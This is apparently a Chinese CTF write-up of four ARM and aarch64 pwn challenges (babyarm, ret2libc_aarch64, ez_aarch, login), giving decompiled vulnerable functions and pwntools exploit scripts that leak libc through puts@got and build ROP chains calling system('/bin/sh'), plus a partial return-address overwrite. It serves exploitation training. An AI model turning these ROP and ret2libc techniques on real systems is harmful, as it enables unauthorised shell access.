异架构刷题记录
2022安询杯babyarm
分析流程可以发现,就是一个变表base64加密,然后异架构的栈溢出罢了
/*
 * Decompiled challenge function (babyarm, 32-bit ARM), as shown in the
 * writeup.  Reads a message, encodes it with a custom-alphabet base64
 * (base64() itself is not on this page) and, if the encoding matches a
 * fixed string, reads a "comment" into a small stack buffer.
 *
 * Returns: the result of the final read() on the success path, otherwise
 * the strcmp() result (non-zero).
 */
int sub_10B60()
{
    unsigned int v0;
    int result;
    char v2[32];     /* 32-byte stack buffer; see the 256-byte read below */
    void *s;
    void *buf;

    buf = malloc(0x80u);
    printf("msg> ");
    /* Read length equals the allocation, so no heap overflow here.  malloc()
     * does not zero memory, so a full 0x80-byte input leaves buf without a
     * NUL terminator before the strlen() below. */
    read(0, buf, 0x80u);
    s = malloc(0x200u);
    memset(s, 0, 0x200u);
    v0 = strlen((const char *)buf);
    /* Custom base64 into s (0x200 bytes); with ordinary 4/3 expansion a
     * 0x80-byte input fits comfortably — assuming base64() does not expand
     * more than the standard encoding. */
    base64((int)buf, v0, (int)s);
    printf("res> ");
    puts((const char *)s);
    result = strcmp((const char *)s, "Sp5jS6mpH6LZC6GqSWe=");
    if ( !result )
    {
        printf("comment> ");
        /* BUG: up to 256 bytes are read into the 32-byte v2 — this is the
         * stack buffer overflow the writeup exploits.  Bounding the read
         * to sizeof(v2) would remove it. */
        return read(0, v2, 256u);
    }
    return result;
}
解题思路
通过 base64 变表解密得到正确的 msg,然后利用栈溢出泄露 libc 基址,再 ret2libc 即可
exp
# Solve script for babyarm (pwntools).  The script is a straight-line
# interaction with the target: every recvuntil/send pair must line up with
# the prompts printed by sub_10B60 ("msg> ", "res> ", "comment> ").
from pwn import *

# Plaintext whose custom-base64 encoding equals the expected constant, which
# unlocks the "comment> " read (the decoding step itself is not on this page).
msg = b's1mpl3Dec0d4r\n'

io = remote("127.0.0.1",1000)
# NOTE(review): str arguments to recvuntil()/send() are accepted but newer
# pwntools releases warn about them; the bytes form (b"msg> ") is the
# unambiguous spelling.
io.recvuntil("msg> ")
io.send(msg)
elf = ELF("./chall")
# Gadget addresses in the challenge binary (non-PIE, build-specific):
#   pop {r4-r8, sb, sl, pc}
#   pop {r3, pc}
#   mov r0, r7 ; blx r3
pop_r45678_sb_sl_pc = 0x00010cb0
pop_r3_pc = 0x00010464
mov_r0_r7_blx_r3 = 0x00010ca0
libc = ELF("./libc-2.27.so")
main_addr = 0x00010C30

# Stage 1: leak the runtime address of puts.  32+8+4 bytes of padding cover
# v2[32] plus (presumably) the saved registers up to the return address —
# confirm against the frame layout if the binary is rebuilt.  Chain:
#   pop {r3, pc}            -> r3 = puts@plt
#   pop {r4-r8, sb, sl, pc} -> r7 = puts@got, other registers 0
#   mov r0, r7 ; blx r3     -> puts(puts@got)
# followed by main_addr repeated so execution lands back in main afterwards.
payload = b'a'*(32+8+4)+p32(pop_r3_pc)+p32(elf.plt['puts'])+p32(pop_r45678_sb_sl_pc)+p32(0)*3+p32(elf.got['puts'])+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(main_addr)*10
io.recvuntil("comment> ")
io.send(payload)
# NOTE: despite the name, puts_got holds the leaked *contents* of puts@got,
# i.e. the runtime address of puts in libc, not the GOT slot address.
puts_got = u32(io.recv(4))
print(f"[+] puts_got = {hex(puts_got)}")
libc_base = puts_got-libc.sym['puts']
print(f"[+] libc_base = {hex(libc_base)}")
sys_addr = libc_base+libc.sym['system']
binsh_addr = libc_base+next(libc.search(b"/bin/sh"))
print(f"[+] sys_addr = {hex(sys_addr)}")
print(f"[+] binsh_addr = {hex(binsh_addr)}")

# Stage 2: same chain shape with r3 = system and r7 = "/bin/sh" pointer.
payload = b'a'*(32+8+4)+p32(pop_r3_pc)+p32(sys_addr)+p32(pop_r45678_sb_sl_pc)+p32(0)*3+p32(binsh_addr)+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(main_addr)*10
# The program was returned into main, so the msg check has to be passed again.
io.recvuntil("msg> ")
io.send(msg)
io.recvuntil("comment> ")
io.send(payload)
io.interactive()
2022年美团杯_ret2libc_aarch64
分析下来存在明显的栈溢出
/*
 * Decompiled challenge function (aarch64), as shown in the writeup.
 * gets() has no length bound, so any input longer than the 128-byte buffer
 * overwrites whatever follows s on the stack.  fgets(s, sizeof s, stdin)
 * would be the bounded equivalent.
 */
__int64 overflow()
{
    char s[128];

    printf("> ");
    gets(s);      /* BUG: unbounded read into a 128-byte stack buffer */
    puts("Your Input: \n");
    puts(s);
    return 0LL;
}
解题思路
发现存在栈溢出,于是第一时间想到 ret2csu,但是发现 csu gadget 的地址中含有 0x0a(换行符,会被 gets 截断),于是我们换成其他方法:先泄露 libc 的地址,然后利用 libc 里面的 gadget 去 getshell
exp
def exploit():
    """Solve the aarch64 ret2libc challenge.

    Relies on helpers that are not on this page: ru/sl/sla/r (pwntools
    recvuntil/sendline/sendlineafter/recv wrappers) and a global ``libc``
    ELF object.  The menu interaction (options 1 and 2) is also inferred
    from the prompts used here rather than shown.
    """
    puts_got = 0x411030
    ru("3.Exit.\n")
    # Option 1 appears to print the contents of a caller-supplied address;
    # feeding it puts@got leaks the runtime address of puts.
    sl(b"1")
    sla("sensible>>\n",p64(puts_got))
    # Only the low 3 bytes are read back; the fixed 0x55_0000_0000 upper part
    # presumably reflects the emulator's fixed mapping base — confirm if the
    # environment changes.
    puts_addr = 0x5500000000+u64(r(3).ljust(8,b"\x00"))
    base_addr = puts_addr-libc.symbols["puts"]
    system_addr = base_addr+libc.symbols["system"]
    binsh_addr = base_addr+next(libc.search(b"/bin/sh\x00"))
    addr_name_list = ['puts','base','system','binsh']
    # NOTE(review): exec() is used purely to print the four locals by name;
    # a plain dict of name -> value would do the same without exec.
    for i in addr_name_list:
        exec("print('{}_addr is :',hex({}_addr))".format(i, i))
    # libc gadget used instead of __libc_csu_init (whose address contains
    # 0x0a, which gets() would stop at).  What this gadget loads from the
    # stack is not shown on the page; the slot order in pl is what it expects.
    gadgets = 0x0000000000068e40 + base_addr
    deadbeef = 0xdeadbeef
    # 0x88 = 128-byte s plus (presumably) the saved x29 before the return slot.
    pl = b'A'*0x88+p64(gadgets)+p64(deadbeef)*2+p64(deadbeef)+p64(system_addr)+p64(deadbeef)+p64(binsh_addr)
    ru(">")
    # Option 2 reaches overflow(); the payload goes into gets().
    sl(b'2')
    ru("sensible>>")
    sl(pl)
Dest0g3_520迎新赛_ez_aarch
刚开始发现是栈溢出,但是保护基本全部开启了,给我吓了一跳,但是后来才发现存在后门,于是简单部分覆盖即可
/*
 * Decompiled challenge function (ez_aarch, aarch64), as shown in the writeup.
 * The decompiler presents buf as a single char; the read() accepts 48 bytes,
 * so everything past the first byte lands on the surrounding stack frame.
 */
__int64 sub_968()
{
    char buf;

    puts("Please leave your name:");
    read(0, &buf, 48uLL);   /* BUG: 48-byte read into a 1-byte stack variable */
    return puts("OK, you can exploit it now.");
}
exp
def exploit():
    """Solve ez_aarch with a one-byte partial overwrite.

    ``sa`` (a sendafter wrapper) is defined elsewhere.  0x28 bytes of padding
    reach the saved return address and the single 0x3c byte replaces its low
    byte, redirecting into the backdoor the writeup mentions; the remaining
    bytes stay intact, which is why PIE does not matter here.  The 0x3c value
    is specific to this binary — TODO confirm against the backdoor's offset.
    """
    sa("Please leave your name:\n",b"A"*0x28+p8(0x3c))
login
和babyarm打法是一样的
exp
def exploit():
    """Solve "login" (32-bit ARM) the same way as babyarm: leak puts, then
    ret2libc with system("/bin/sh").

    Uses helpers not shown on this page: ru/sl (recvuntil/sendline
    wrappers) plus global ``io``, ``elf`` and ``libc`` objects.
    """
    # Gadgets in the challenge binary (build-specific):
    #   pop {r4-r8, sb, sl, pc} / mov r0, r7 ; blx r3 / pop {r3, pc}
    po_r4_r5_r6_r7_r8_sb_sl_pc = 0x0001070c
    mov_r0_r7_blx_r3 = 0x000106fc
    pop_r3_pc = 0x000103f0
    puts_got = elf.got["puts"]
    puts_plt = elf.plt["puts"]
    ru("Please enter your username: ")
    sl(b'admin')
    ru("Please enter your password: ")
    # Stage 1: 0x108 bytes of padding to the return address, then
    #   pop {r4-r8, sb, sl, pc} -> r7 = puts@got, pc = pop {r3, pc}
    #   pop {r3, pc}            -> r3 = puts@plt, pc = mov r0, r7 ; blx r3
    # giving puts(puts@got).  The seven zero words and 0x105D0 that follow
    # presumably satisfy the epilogue after the blx and return into the
    # program's main loop — confirm against the disassembly.
    pl = b"A"*0x108+p32(po_r4_r5_r6_r7_r8_sb_sl_pc)+p32(0)*3+p32(puts_got)+p32(0)*3+p32(pop_r3_pc)+p32(puts_plt)+p32(mov_r0_r7_blx_r3)+p32(0)*7+p32(0x00105D0)
    sl(pl)
    ru(".\n")
    # NOTE(review): this is the one place the raw io object is used instead
    # of the wrappers; u32 of the 4 leaked bytes is the runtime puts address.
    libc_base = u32(io.recv(4))-libc.sym["puts"]
    print(f"[+] libc_base = {hex(libc_base)}")
    sys_addr = libc_base+libc.sym["system"]
    binsh_addr = libc_base + next(libc.search(b"/bin/sh"))
    ru("Please enter your username: ")
    sl(b'admin')
    ru("Please enter your password: ")
    # Stage 2: r3 = system, r7 = "/bin/sh", then mov r0, r7 ; blx r3.
    # Unlike stage 1 there are no filler words before the final 0x105D0;
    # that only matters if execution ever reaches the epilogue after system().
    payload =b"A"*0x108+p32(pop_r3_pc)+p32(sys_addr)+p32(po_r4_r5_r6_r7_r8_sb_sl_pc)+p32(0)*3+p32(binsh_addr)+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(0x00105D0)
    sl(payload)